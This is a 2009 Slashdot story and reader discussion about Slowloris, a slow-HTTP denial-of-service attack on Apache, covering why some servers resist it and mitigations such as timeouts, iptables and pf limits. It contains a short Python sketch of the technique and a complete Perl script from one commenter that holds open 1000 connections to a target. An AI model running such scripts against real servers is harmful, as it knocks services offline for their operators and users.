
Attack On a Significant Flaw In Apache Released 203

Zerimar points out that an attack exploiting a significant flaw in Apache, one that enables a fairly trivial DoS, is in the wild. Apache 1.x, 2.x, dhttpd, GoAhead WebServer, and Squid are confirmed vulnerable, while IIS6.0, IIS7.0, and lighttpd are confirmed not vulnerable. As of this writing, the Apache Foundation does not have a patch available. From RSnake's introduction to the attack tool: "In considering the ramifications of a slow denial of service attack against particular services, rather than flooding networks, a concept emerged that would allow a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. The ideal situation for many denial of service attacks is where all other services remain intact but the webserver itself is completely inaccessible. Slowloris was born from this concept, and is therefore relatively very stealthy compared to most flooding tools."
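The mechanism is simple enough to sketch in a few lines of Python. This is an illustration of the technique only, not the actual tool (Slowloris itself is a Perl script with many more options), and the header names below are arbitrary:

```python
import socket

def open_slow_connection(host, port=80):
    """Open a connection and send a deliberately incomplete HTTP request.

    The blank line that terminates the header block is never sent, so a
    server that dedicates a worker to each connection keeps that worker
    waiting for the rest of the request.
    """
    s = socket.create_connection((host, port))
    s.sendall(b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n")
    return s

def keep_alive(connections):
    """Trickle one bogus header line per connection to reset idle timers."""
    for s in connections:
        s.sendall(b"X-a: b\r\n")  # still no terminating blank line
```

Point a few hundred of these at a server that ties up a worker per connection, call keep_alive() periodically, and the worker pool fills while total bandwidth stays negligible.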
This discussion has been archived. No new comments can be posted.

  • by santax ( 1541065 ) on Friday June 19, 2009 @09:22AM (#28389621)
    be prepared to feel the slashdot-effect yourself for once!
  • by Anonymous Coward
    Opera Unite?
  • by Rogerborg ( 306625 ) on Friday June 19, 2009 @09:28AM (#28389703) Homepage

    It's just holding sockets open; that's the "Hello, world!" of DoS attacks.

    I'm finding it hard to believe that Apache is genuinely vulnerable to this. Did nobody see it coming? For real?

    • Re: (Score:3, Informative)

      by Lord Ender ( 156273 )

      No, it's not. It's holding an HTTP session open. That is not the same thing as a TCP socket.

    • This type of attack is already known as an "attack by a 1,000 snails". It is harder to defend against than you would think: a user can legitimately be slow, and coders are hesitant to drop users who are too slow or too fast.

      A client can keep the TCP/IP connection alive just by sending one byte every x seconds. If this is patched at the HTTP header level, you will find you can do the same kind of attack at the application level, which may have a limited number of PHP or Perl sessions.

    • Re: (Score:3, Interesting)

      by suso ( 153703 ) *

      Yes, I agree. I've seen a handful of attacks like this over the years. Maybe not exactly this one, but Apache has been vulnerable to this for years; I thought all webservers were, and that people already knew about it. This one is tough to fix, too: it's not like Apache can just patch something. It sounds like an architectural change is needed.

  • Why not IIS? (Score:4, Interesting)

    by MBCook ( 132727 ) <foobarsoft@foobarsoft.com> on Friday June 19, 2009 @09:29AM (#28389711) Homepage

    Why isn't IIS vulnerable? Does it just assume the headers are done after some amount of time? Does it have a limit to the number of headers it accepts?

    Can this even be fixed without technically breaking the protocol (since it sounds like what's going on is correct behavior, theoretically)?

    • Re: (Score:3, Interesting)

      What I'm thinking is: is this basically another case where the servers that aren't vulnerable were actually not respecting the spec?
      • Re:Why not IIS? (Score:5, Insightful)

        by Malc ( 1751 ) on Friday June 19, 2009 @10:08AM (#28390307)

        Does the HTTP spec say anything about the server application timing out the connection? Seems like reasonable behaviour to me. I would be surprised if this isn't a configurable option in Apache too.

        People love to hate it, but IIS has matured into a very good web server. It's my choice over Apache.

    • by Opportunist ( 166417 ) on Friday June 19, 2009 @09:51AM (#28390041)

      If the vulnerability is based on correct, standards-conformant behaviour of the server, I can see why IIS isn't susceptible to it.

      • Re: (Score:2, Informative)

        by Anonymous Coward

        More likely IIS survives because it uses a worker pool threading model (no thread/process is dedicated to a connection, so a connection only takes up memory for the state, not for the thread).

        Apache had, and probably still has, a process/thread-per-connection model.

        So with all due respect, it looks like a proper design decision is what is protecting IIS here:
        http://www.kegel.com/c10k.html
        http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/a63ee1c2-04d6-44dc-b4d6-678eb3117bf9.mspx?mfr=
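The difference the parent describes can be seen in a toy event-loop server (a Python sketch of the worker-pool idea in general, not IIS's actual architecture): one thread multiplexes every connection, so an idle slow client costs only a socket and a little state.

```python
import selectors
import socket

sel = selectors.DefaultSelector()

def make_server(port=0):
    """Non-blocking listener; returns the socket so the caller knows the port."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(128)
    srv.setblocking(False)
    sel.register(srv, selectors.EVENT_READ, _accept)
    return srv

def _accept(srv):
    conn, _ = srv.accept()       # a new connection is just more state,
    conn.setblocking(False)      # not a new thread or process
    sel.register(conn, selectors.EVENT_READ, _echo)

def _echo(conn):
    data = conn.recv(4096)
    if data:
        conn.sendall(data)       # echo back, standing in for real work
    else:
        sel.unregister(conn)     # client closed: release its state
        conn.close()

def step(timeout=0.5):
    """Run one pass of the event loop (a real server would loop forever)."""
    for key, _ in sel.select(timeout):
        key.data(key.fileobj)
```

In this model a Slowloris-style client merely sits in the selector's registry; only connections that actually become readable consume any CPU.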

      • Is it really correct and standard to hold a session open for a client that isn't sending any data, while excluding other clients in the process? Where in the spec does it say to do that?

      • I might subscribe to your theory if it weren't for the fact that lighttpd [lighttpd.net], which is a first-rate open-source web server, is explicitly listed as not vulnerable.

    • Re:Why not IIS? (Score:5, Informative)

      by Amouth ( 879122 ) on Friday June 19, 2009 @10:03AM (#28390209)

      Unless you are using Session()s in ASP, one thread in IIS handles multiple connections.

      What this attack does is open a connection (getting a thread to work it), hold it open (keeping the thread busy), and just keep asking for new ones.

      It is very common (universal, I think) for Apache and a lot of web servers to have a maximum thread count so that a site under heavy traffic doesn't open more connections than it can handle.

      IIS also has a worker thread limit, but there is no limit (you can set one, but it is not on by default) on how many concurrent connections a single thread can manage, and new incoming connections are passed to the thread with the lowest current workload, not necessarily the one with the fewest connections.

      If you do what this tool does, I can see IIS slowly piling all these slow, no-work connections onto one thread while the others happily go about doing actual work,

      whereas Apache would slowly lose access to workable threads as the attack keeps them busy.

      This isn't an exploit of the HTTP or TCP protocol; it is an exploit of the web server's connection-management behavior.

      • by MBCook ( 132727 )

        Makes sense.

        But wouldn't you run into the connection limit of the OS at some point? Or is that just way too high to be a practical problem (say 16 million)?

        • by Amouth ( 879122 )

          well, the connection limit for a single host is the number of available ports for outbound traffic (to return data to the client)

          by default (from memory here) I want to say IIS is set up to use ~4k ports for outbound; I do know that can be changed to allow ports 1024+ to be used, meaning the number of available ports would be ~64.5k

          and that is per host IP; unless you have the site bound to a specific host IP address (instead of using site headers), IIS will respond on an alternate IP (if it has one) when another is out of ports

          • unless you have the site bound to a specific host ip address (instead of using site headers - iis will respond on an alternate ip (if it has one) when another is out of ports

            How would that be of any use? The client on the far end is directing incoming traffic based on source IP (among other characteristics). TCP packets that arrive from random IPs are discarded.

            • by Amouth ( 879122 )

              the incoming traffic is always going to IP:80

              the return traffic from IIS is coming from available IPs:port

              if you bind a website in IIS to an IP instead of "any available IP", then the return TCP connection is forced to be sourced from the IP that is also receiving

              if you have it set to "any available IP" and the box has 2 IPs, your client may request data on IPA:80 and get a reply from IPB:port

              therefore your available ports for replies (limiting the max connections) would be MaxPorts * Available IPs.

              • Re:Why not IIS? (Score:4, Informative)

                by raju1kabir ( 251972 ) on Friday June 19, 2009 @11:34AM (#28391487) Homepage

                if you have it set to "any available IP" and the box has 2 IPs, your client may request data on IPA:80 and get a reply from IPB:port

                If a client sends a SYN to 10.1.1.1:80 and gets a SYN-ACK from 10.5.5.5:80, the client will not associate the two as related, and will keep waiting for a response from 10.1.1.1:80 until timing out.

                You would need to have some sort of DNS arrangement that encouraged clients to make their requests to your various IPs. You can't just respond from a different IP than the client contacted.

          • well the connection limit for a single host is the number of available ports for outbound traffic (to return data to the client)

            A TCP connection is identified by the source IP:port and destination IP:port. Your web server typically will listen on only one port (80) and probably on a single IP, and TCP has 64k ports available. So, the theoretical limit is 64k connections from each and every computer with a routable IP address. Which is completely insane, so what really matters are the limits your OS puts on how many open sockets/file descriptors there can be (per process, or across the entire system), and if that's high enough then t

            • A TCP connection is identified by the source IP:port and destination IP:port. Your web server typically will listen on only one port (80) and probably on a single IP, and TCP has 64k ports available. So, the theoretical limit is 64k connections from each and every computer with a routable IP address.

              Not really. Yes, the server application listens at a specific IP:port - typically 80 in case of HTTP. However, when you accept() a client connection on the socket you're listening on, you get a new socket for that connection, which is associated with a new, unique port on the server. So you can only have as many client connections on the server as you have ports.
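This is easy to check empirically. In the Python sketch below, the socket returned by accept() reports the same local port the server listens on; what distinguishes one connection from another is the client's IP and port, not a fresh server-side port:

```python
import socket

# Listen on an ephemeral port, connect to ourselves, and compare ports.
srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(1)
server_port = srv.getsockname()[1]

client = socket.create_connection(("127.0.0.1", server_port))
conn, peer = srv.accept()

# The accepted socket's local port is the listening port, not a new one;
# what is unique per connection is the client's (IP, port) pair.
assert conn.getsockname()[1] == server_port
assert peer == client.getsockname()
```

So the server-side limit really is file descriptors and memory, not ports.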

    • by Bemopolis ( 698691 ) on Friday June 19, 2009 @11:09AM (#28391121)

      Why isn't IIS vulnerable

      My guess is that the DoS attack is so slow that, by the time it would have completed, the server has already crashed for a different reason.

    • Doesn't IIS leave sessions "half open" generally? Some kind of IE accelerator trick? Or did they stop doing that?
  • Boring (Score:5, Insightful)

    by Anonymous Coward on Friday June 19, 2009 @09:29AM (#28389719)
    Talk about a boring exploit: no chance of expanding the attack into anything other than a DoS, and if it becomes widespread enough, fairly trivial to fix (just kill the oldest waiting client that does not yet have a full header when the last client slot is taken). I'd be embarrassed to publish something like this....
    • Surely it's far more embarrassing for the person on the receiving end of the attack.
    • I'd be embarrassed to publish something like this....

      Says the Anonymous Coward

    • fairly trivial to fix ...
      I'd be embarrassed to publish something like this

      So why isn't it fixed? Let me guess: it's a case of all of the Apache developers saying "you have access to the code, you fix it, it's trivial."

  • iptables helps (Score:5, Informative)

    by samjam ( 256347 ) on Friday June 19, 2009 @09:30AM (#28389733) Homepage Journal

    You can have perlbal or any reverse proxy on the same machine, listening on a different port (say 8080), and then use iptables to redirect incoming web traffic to it like this

    # iptables -t nat -A PREROUTING ! -d 127.0.0.1 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080

    and then you don't need to change your Apache configuration - and having Apache listen on a different port than what users see can break some scripted sites if they read the port number from the Apache config.

  • by Z00L00K ( 682162 ) on Friday June 19, 2009 @09:30AM (#28389737) Homepage Journal

    And the only resolution right now that I can see is to have a connection timeout.

    At least the problem is a denial of service problem and not a problem with intrusion so the damage is easily rectified - restart the web server. Not that you really want to restart it.

    And I suspect that other services can be vulnerable to this type of attack too, not only web servers.

    • the damage is easily rectified - restart the web server

      And you get hammered again as soon as it comes back up. How does restarting it help?

      • It will take some time to ramp up the used connections again (assuming that, as the article states, this exploit is fairly slow). While certainly not a real fix, this could be an effective temporary solution until a better solution is available.
        • by micheas ( 231635 )

          Fairly slow has been under a minute on most of the servers I tested it on.

          Fortunately my servers are configured to be able to run either lighttpd or apache. (in case I have a problem with one.)

          So I can pick my poison.

    • Re: (Score:3, Interesting)

      by sjames ( 1099 )

      A connection timeout should be fine. Just start the clock upon accept(). Give the client a generous but limited amount of time to send headers. If the timer expires before the empty line is received, close the connection.

      Bonus points for not getting the thread pool involved until the header is complete.

      Extra credit for a config option to send a flood of junk to the client and THEN close the socket. That could make attackers considerably more visible to their upstream provider.
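A sketch of that scheme in Python (a hypothetical helper, not Apache code; the deadline and header-size cap are arbitrary assumptions): the clock starts when the freshly accepted socket is handed over, and trickled bytes do not reset it.

```python
import socket
import time

def read_header(conn, deadline_s=10.0, max_header=8192):
    """Read HTTP request headers under an absolute deadline.

    Either the blank line that ends the header block arrives within
    deadline_s seconds of accept(), or the connection is dropped; a
    client that trickles one byte at a time cannot extend the budget.
    """
    deadline = time.monotonic() + deadline_s
    buf = b""
    while b"\r\n\r\n" not in buf:
        remaining = deadline - time.monotonic()
        if remaining <= 0 or len(buf) > max_header:
            conn.close()              # too slow or too big: give up
            return None
        conn.settimeout(remaining)
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            conn.close()
            return None
        if not chunk:                 # client went away
            conn.close()
            return None
        buf += chunk
    return buf
```

Only once read_header() returns a complete header would the connection be handed to the worker pool, which is the parent's bonus-points suggestion.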

      • Re: (Score:3, Interesting)

        by sjames ( 1099 )

        Nothing like replying to yourself.

        Double extra credit if the junk you send back looks enough like downloading music that the RIAA accidentally joins the forces of good and comes down on the attacker due to ISP snooping but not enough like downloaded music to get you actually busted.

    • the damage is easily rectified - restart the web server

      Good idea, mitigate a DoS attack by taking the server offline.

  • Could you potentially get around this if you're proxying to another web server, say lighttpd or Mongrel, or will this just blanketly affect Apache if you have it in front? I'm gathering the latter from the article:

    At the moment I'm not sure what can be done in Apache's configuration to prevent this attack - increasing MaxClients will just increase requirements for the attacker as well but will not protect the server completely. One of our readers, Tomasz Miklas said that he was able to prevent the attack

    • Re:[Sounds Stupid] (Score:3, Interesting)

      by segedunum ( 883035 )
      Having read more of this, it just strikes me as incredibly stupid. Did they publish this? Surely we're just talking about a timeout implementation here, where the web server says "Ahhhh, well, you didn't complete that header; bye, bye"?
      • How long would you set the timeout?

        Let's say it's 3 seconds (if you want to support crappy dialup connections from South Africa, that sounds about right). That means that an attacker can block out your server for 3 seconds... at a time. As soon as you kill his connections, he just recreates them anew. Or, better yet, determines your timeout, and then disconnects just before your server would drop the connection (so that the logs look more benign).

    • Re: (Score:2, Informative)

      by natbudin ( 577028 )
      I just tried it against nginx 0.6.37. The attack appears to work there as well.
  • Possible work-around (Score:4, Interesting)

    by Norsefire ( 1494323 ) * on Friday June 19, 2009 @09:35AM (#28389809) Journal
    From the source:

    if ( $delay < 166 ) {
    print <<EOSUCKS2BU;
    Since the timeout ended up being so small ($delay seconds) and it generally
    takes between 200-500 threads for most servers and assuming any latency at
    all... you might have trouble using Slowloris against this target. You can
    tweak the -tcpto flag down to 1 second but it still may not build the sockets
    in time.
    EOSUCKS2BU
    }

    Lower Apache's timeout to below 166 seconds.

  • by possible ( 123857 ) on Friday June 19, 2009 @09:39AM (#28389877)

    OpenBSD's pf [openbsd.org] firewall has some options that can help mitigate the "single attacker, single source IP" version of this attack. Of course if the attackers decide to spread the attack out over multiple source IPs like a DDoS, this becomes much harder to deal with until Apache has a patch.

    Filter rules that create state entries can specify various options to control the behavior of the resulting state entry. The following options are available:

    max number
    Limit the maximum number of state entries the rule can create to
    number.
    If the maximum is reached, packets that would normally create state
    fail to match this rule until the number of existing states decreases
    below the limit.
    no state
    Prevents the rule from automatically creating a state entry.
    source-track
    This option enables the tracking of number of states created per
    source IP address.

    The total number of source IP addresses tracked globally can be
    controlled via the

    src-nodes runtime option.

    max-src-nodes number
    When the source-track option is used,
    max-src-nodes will limit the number of source IP addresses that
    can simultaneously create state.
    This option can only be used with the source-track rule option.
    max-src-states number
    When the source-track option is used,
    max-src-states will limit the number of simultaneous state
    entries that can be created per source IP address.
    The scope of this limit (i.e., states created by this rule only or
    states created by all rules that use source-track) is dependent
    on the source-track option specified.
  • by cjb-nc ( 887319 ) on Friday June 19, 2009 @09:47AM (#28389991)
    Obviously need to verify this, but we already run mod_cband [sourceforge.net] with a per-IP connection limit of 5. This is in place to stop the over-zealous "download accelerators" from taking all our connections and DOS'ing us. I expect it would stop a single attacker using this attack, but we'd still be vulnerable to a concerted attack by MaxChildren/5 IPs.
    • Re: (Score:2, Informative)

      by id ( 11164 )

      mod_cband has been tested and doesn't have any effect.

  • by moon3 ( 1530265 ) on Friday June 19, 2009 @09:51AM (#28390057)
    If you keep lingerers around for more than 160 seconds, then no wonder this is possible.

    It should be a non-issue on better-designed servers that keep an eye on connections anyway. Any single IP spawning lots of unfinished connections gets flagged fast and remembered for the future, so it gets limited access and bandwidth, gets marked as an abuser, etc. This is serving 101.
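That bookkeeping amounts to something like the following sketch (the threshold is an arbitrary assumption, and a real server would also age entries out and penalize repeat offenders):

```python
from collections import defaultdict

UNFINISHED_LIMIT = 20          # assumed per-IP budget for half-done requests

half_open = defaultdict(int)   # source IP -> connections awaiting a full header

def on_connect(ip):
    """Admit the connection only while the source IP is under its budget."""
    half_open[ip] += 1
    return half_open[ip] <= UNFINISHED_LIMIT

def on_header_complete(ip):
    """This request finished its header; it no longer counts against the budget."""
    if half_open[ip] > 0:
        half_open[ip] -= 1
```

A single-source Slowloris run trips the limit almost immediately; a distributed attack, with each source staying under the budget, still gets through.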
  • by Anonymous Coward on Friday June 19, 2009 @09:53AM (#28390091)

    http://httpd.apache.org/docs/2.2/mod/core.html#timeout

    The issue is that the default configuration waits 5 minutes for the full request, which is painfully long. Drop that from 300 to 5, and the "attack" goes away. If you are running the default Apache config in production, you shouldn't be.

    • by ID000001 ( 753578 ) on Friday June 19, 2009 @10:18AM (#28390433)

      http://httpd.apache.org/docs/2.2/mod/core.html#timeout

      The issue is that the default configuration waits 5 minutes for the full request, which is painfully long. Drop that from 300 to 5, and the "attack" goes away. If you are running the default Apache config in production, you shouldn't be.

      seem like a potential fix, can anyone confirm?

      • Wouldn't this also affect file uploading? I'm not sure, but I think those are sent as part of the HTTP header.

      • Re: (Score:3, Informative)

        by Anonymous Coward
        The work-around works fine.

        I downloaded Slowloris and was able to take down a default Apache install; however, with KeepAlive disabled and a Timeout of 5, the attack became ineffective.

        This may be a problem for sites with users that do long-running POSTs, but since we don't have any of those, all I can say is "It works here . . . "

        For more info: http://httpd.apache.org/docs/trunk/misc/security_tips.html [apache.org]
    • Re: (Score:3, Insightful)

      by TheLinuxSRC ( 683475 ) *
      From the article:

      "...the server will open the connection and wait for the complete header to be received. However, the client (the DoS tool) will not send it and will instead keep sending bogus header lines which will keep the connection allocated."

      In other words.. the connection is not allowed to "timeout" as there is (bogus) traffic on the connection.
    • Re: (Score:3, Insightful)

      by dlgeek ( 1065796 )
      The problem with that is it will break nontrivial uploads using POST, since they won't complete in 5 seconds. The real solution is to not count threads or connections below a certain utilization threshold towards the capped max, and to kill them once you hit real starvation.
      • by myz24 ( 256948 )

        Did you read the doc? Seems like they thought of that situation. Here is the info

        1. The total amount of time it takes to receive a GET request.
        2. The amount of time between receipt of TCP packets on a POST or PUT request.
        3. The amount of time between ACKs on transmissions of TCP packets in responses.

    • If you are running the default Apache config in production, you shouldn't be.

      That's one of the most damning things you can say about a package.

  • by greed ( 112493 ) on Friday June 19, 2009 @09:54AM (#28390101)

    HTTP 1.1 [rfc-editor.org] specifies a status code for "Request Timeout" (408) and "Gateway Timeout" (504).

    What is needed, therefore, is a timer running for receiving the complete header, and a second one for accepting the body. The timer for the body can be controlled by the type of request and the Content-Length header. (With, of course, a specific cap.)

    Currently, Apache 2.2 [apache.org] has a single timeout value for all types of requests, but it is interpreted differently for the different types.

    If your server only handles GETs, the obvious thing is to crank that number down. Unfortunately, for PUTs, the TimeOut value affects inter-packet time in the request, not overall request time.

    Strangely, the timeout doesn't seem to run in 2.2.10 and 2.2.11 before data is received. Oh dear. That's an even simpler DoS.

    #!/usr/bin/env perl

    use strict;
    use IO::Socket::INET;
    use constant DEFAULT_PORT => "http";

    MAIN: {
        if (@ARGV < 1 or @ARGV > 2) {
            die "Usage: $0 host [port]\n";
        }
        my ($host) = shift;
        my ($port) = @ARGV ? shift : DEFAULT_PORT;

        my @sockets;

        for (my $cnt = 0; $cnt < 1000; ++$cnt) {
            my $socket = new IO::Socket::INET(
                PeerAddr => $host,
                PeerPort => $port,
                Proto    => "tcp",
            );
            unless (defined($socket)) {
                die "Cannot create socket to $host:$port--$!\n";
            }
            $socket->print("\r\n");
            push(@sockets, $socket);
            print "Have " . @sockets . " open.\n";
        }
    }

    Not quite as stealthy, though. At least as above.
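For completeness, the second timer proposed above (for the body, driven by Content-Length, with a specific cap) could be sketched like this in Python; the limit values are arbitrary assumptions, not Apache's defaults:

```python
import socket
import time

def read_body(conn, content_length, idle_s=5.0, overall_cap_s=300.0):
    """Read exactly content_length bytes of request body.

    Two limits apply: no single gap between packets may exceed idle_s,
    and the whole transfer may not exceed overall_cap_s.  Returns the
    body, or None if either limit (or the peer) gives out first.
    """
    deadline = time.monotonic() + overall_cap_s
    buf = b""
    while len(buf) < content_length:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            conn.close()                              # overall cap exhausted
            return None
        conn.settimeout(min(idle_s, remaining))       # whichever limit is nearer
        try:
            chunk = conn.recv(min(4096, content_length - len(buf)))
        except socket.timeout:
            conn.close()                              # inter-packet gap too long
            return None
        if not chunk:
            conn.close()                              # client went away
            return None
        buf += chunk
    return buf
```

The per-gap timer is what lets large, legitimate uploads proceed while still bounding how long a dribbling client can hold the connection.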

    • by greed ( 112493 ) on Friday June 19, 2009 @10:48AM (#28390823)

      BTW, is there a self-mod value for "I'm not sure I should have posted that"?

    • That's informative, but I thought the point about GET vs. POST and PUT was confusing.

      To be clear, the Timeout directive can be set low without affecting the ability of people to upload large files to the server. Timeout only applies to the time between packets, which should be a few hundred milliseconds apart under most circumstances, right?

      From the httpd manual:

      The TimeOut directive currently defines the amount of time Apache will wait for three things:

      1. The total amount of time it takes to receive a GET request.

    • by Covener ( 32114 )

      Maybe you're on an OS with a dataready or HTTP accept filter. Timeout applies to reading the entire first line of the request.

  • You can mitigate it somewhat:

    In httpd.conf

    #
    # Timeout: The number of seconds before receives and sends time out.
    #
    Timeout 120

    Unless of course this timeout applies only after the header is received... which I don't think it does... but as they say... assumption is the mother of all f*ckups.

  • ...of one of the 14 year olds who uses this, as she runs the script.

    "Dodge this." ;)

  • Sendmail and other servers are probably vulnerable to this kind of thing. And the server application itself is not necessarily where the core of the slowdown occurs. For example, if one were to spread this kind of attack across several different types of TCP-based protocols (SMTP/SMTPS, IMAP(S), HTTP(S), DNS (TCP version), etc.), then the operating system's TCP engine might start to suffer from too many TCP control blocks. (And it isn't just the memory occupied - some silly implementation m

    • by AaronW ( 33736 )

      My mail server (Postfix) actually takes advantage of this. I have it configured to tarpit known spam sources (from RBL) and hold the connections open without sending a response.

    • by Akatosh ( 80189 )

      Oh, sendmail isn't just probably 'vulnerable'; it definitely is. That's why sendmail has FEATURE(`conncontrol', ,`terminate'), to limit simultaneous sessions per client. Spammers have been abusing this for eons. I put 'vulnerable' in quotes because that feature is configurable, but not a default. If your daemon doesn't have a way of dealing with these things (Apache does, with a module), there's always

      iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 10 -j DROP

  • by Megane ( 129182 ) on Friday June 19, 2009 @12:21PM (#28392111)

    If you're going to post links to isc.sans.org, can you please post links to the specific article, and not just the main page?

    Here is the link to the specific article: http://isc.sans.org/diary.html?storyid=6601 [sans.org]

  • Queuing and timeout (Score:2, Informative)

    by pdxp ( 1213906 )
    IIS worker processes have a request queue. Whether or not you use asynchronous functions to handle requests, there is a fixed maximum number of threads each worker process will run to process requests. While reading from a socket, the worker thread does block, but more threads are not spawned to handle connections. Instead, the worker process puts new requests into a queue until more threads are available.

    I believe this works because there is a timeout associated with the completion of a request. Sure, it
    • by rgviza ( 1303161 )

      On Apache the request timeout directive is TimeOut.

      It does not impact the response timeout. In my tests setting it to 2 seconds broke the tool but did not break normal POSTs and GETs. I saw no lag even with Slowloris running against the server.

      Setting it to 5 seconds caused noticeable lag for a browser request.

      This will probably work with busy servers but the lag times will be much longer. The directive only affects how long the server will wait _after the request stream starts_. Your browser will wait for
